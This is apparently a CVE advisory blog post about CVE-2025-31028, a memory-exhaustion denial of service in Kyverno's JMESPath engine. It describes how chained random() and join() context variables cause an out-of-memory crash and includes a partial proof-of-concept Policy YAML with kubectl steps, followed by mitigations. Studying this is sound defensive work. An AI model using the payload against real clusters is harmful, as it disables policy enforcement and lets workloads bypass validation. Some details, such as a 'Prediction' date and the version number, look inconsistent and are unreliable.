Kyverno, Unbounded Memory Consumption, CVE-2025-31028 (Critical)

Listen to this Post

This vulnerability exploits Kyverno’s JMESPath expression engine, specifically the `random()` and `join()` functions, to cause exponential memory growth. An attacker with policy creation privileges can craft a malicious `Policy` or `ClusterPolicy` resource that defines a series of context variables. The first variable, l0, uses `random(‘[a-zA-Z0-9]{1000}’)` to generate a 1KB string. Each subsequent variable uses `join()` to concatenate the previous variable with itself, doubling the data size (e.g., `l1 = join(”, [l0, l0])` for 2KB). By chaining these operations up to l18, the final context variable holds approximately 256MB of data. During admission request evaluation, Kyverno’s engine processes all context variables without enforcing a cumulative size limit. This forces the admission controller or reports controller to allocate hundreds of megabytes of memory per evaluation, quickly exceeding typical container memory limits (often 256Mi) and triggering an Out-Of-Memory (OOM) kill and crash loop, leading to a Denial of Service.
Platform: Kubernetes (Kyverno)
Version: v1.16.1
Vulnerability: Memory Exhaustion DoS
Severity: Critical
Date: 2025-03-31

Prediction: 2025-04-14

What Undercode Say:

kubectl create namespace poc-test
kubectl get pods -n kyverno -w
kubectl create configmap trigger -n poc-test --from-literal=key=value
kubectl get pods -n kyverno
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: memory-exhaustion-poc
namespace: poc-test
spec:
validationFailureAction: Enforce
rules:
- name: exhaust-memory
match:
any:
- resources:
kinds:
- ConfigMap
context:
- name: l0
variable:
jmesPath: random('[a-zA-Z0-9]{1000}')
- name: l1
variable:
jmesPath: join('', [l0, l0])

How Exploit:

1. Create malicious policy.

2. Trigger evaluation via resource.

3. Controller OOM crashes.

Protection from this CVE

Implement context size limits.

Apply least-privilege for policies.

Upgrade to patched version.

Impact:

Cluster-wide policy enforcement disabled.

Admission controller OOM crashes.

Workloads bypass validation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top